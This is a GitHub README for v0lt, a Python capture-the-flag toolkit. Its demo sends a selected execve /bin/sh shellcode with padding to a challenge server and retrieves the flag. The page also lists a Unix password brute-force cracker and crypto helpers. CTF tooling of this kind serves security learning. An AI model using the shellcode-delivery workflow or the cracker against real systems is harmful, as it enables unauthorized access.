Skip to content

cankuxiaomu/v0lt

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

v0lt

v0lt

v0lt is an attempt to regroup every tool I used/use/will use in security CTF, Python style. A lot of exercises were solved using bash scripts but Python may be more flexible, that's why. Nothing to do with Gallopsled. It's a toy toolkit, with small but specific utils only.

##Requirements and Installation ####Dependencies:

  • Libmagic
  • Python3
    • BeautifulSoup
    • Requests
    • filemagic
    • hexdump
    • passlib

####Installation:

# for v0lt install
git clone https://github.com/P1kachu/v0lt.git
cd v0lt
[sudo] python3 setup.py install # sudo is required for potentially missing dependencies

##Demo: Shellcodes

>>> from v0lt import *
>>> nc = Netcat("archpichu.ddns.net", 65102)
Connected to port 65102
>>> print(nc.read())
GIVE ME SHELLCODZ
>>> shellhack = ShellCrafter(4096, "bin","execve")
>>> shellhack.get_shellcodes(shellhack.keywords)

...<SNIPPED>...
85: Linux/x86:setuid(0) & execve(/sbin/poweroff -f) - 47 bytes
86: Linux/x86:execve (/bin/sh) - 21 Bytes
87: Linux/x86:break chroot execve /bin/sh - 80 bytes
88: Linux/x86:execve(/bin/sh,0,0) - 21 bytes
...<SNIPPED>...

Selection: 86
Your choice: http://shell-storm.org/shellcode/files/shellcode-752.php
Shellcode: "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62[...]"

>>> nc.shellcat(shellhack.shellcode)
>>> nc.writeln(shellhack.pad())
>>> exploit = nc.dialogue("cat flag", 3)
>>> print(exploit)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
File name too long
P1kaCTF{sh3llc0de_1s_e4zY}

##Implemented:

  • Crypto

    • Base64
    • Ceasar shift
    • Hashing functions (SHA, MD5)
    • Bits manipulations (XOR, inverse XOR)
    • Usual conversions (bytes, strings, hex)
    • RSA basics (inverse modulo, inverse power, egcd...)
    • Bruteforcing (Dictionnary, custom word)
  • Shellcodes

    • Shellcode selection and download from Shell-storm repo
    • Shellcode formater
    • Shell{cat,net}: Sending shellcode made easy
    • Automatic padding
  • Easy connection support

    • Netcat
    • Telnet

And more Examples are available here

Changelog

Only includes major features and changes. Bugfixes and minor changes are omitted.

1.4

  • ShellHack becomes ShellCrafter
  • Better ShellCrafter shellcode recovering
  • Add docstrings
  • Refactoring
  • Delete Hexeditor and linux_utils (not good)

1.3

  • Lots of fixes again
  • Hexeditor (Dump/Rewrite files)
  • Unix password bruteforce cracker

1.2

  • Lots of documentation/bugs/framework fixes
  • Added bruteforce
  • Added linux utils
  • Began hexeditor
  • Shellhack fixes
  • Alert messages

1.0

  • Lots of documentation fixes
  • Lots of bugfixes
  • Added shellhack (shellcodes stuff)
  • Added crypto utils
  • Added network utils
  • Fixed project tree

About

Security CTF Toy Tools

Resources

License

Stars

Watchers

Forks

Packages

No packages published

Languages

  • Python 100.0%